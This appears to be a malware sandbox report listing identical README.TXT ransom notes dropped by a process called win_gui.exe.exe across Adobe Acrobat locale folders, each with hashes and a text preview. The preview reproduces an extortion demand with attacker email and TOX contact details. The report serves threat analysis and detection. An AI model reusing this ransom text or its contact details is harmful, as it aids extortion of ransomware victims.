                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
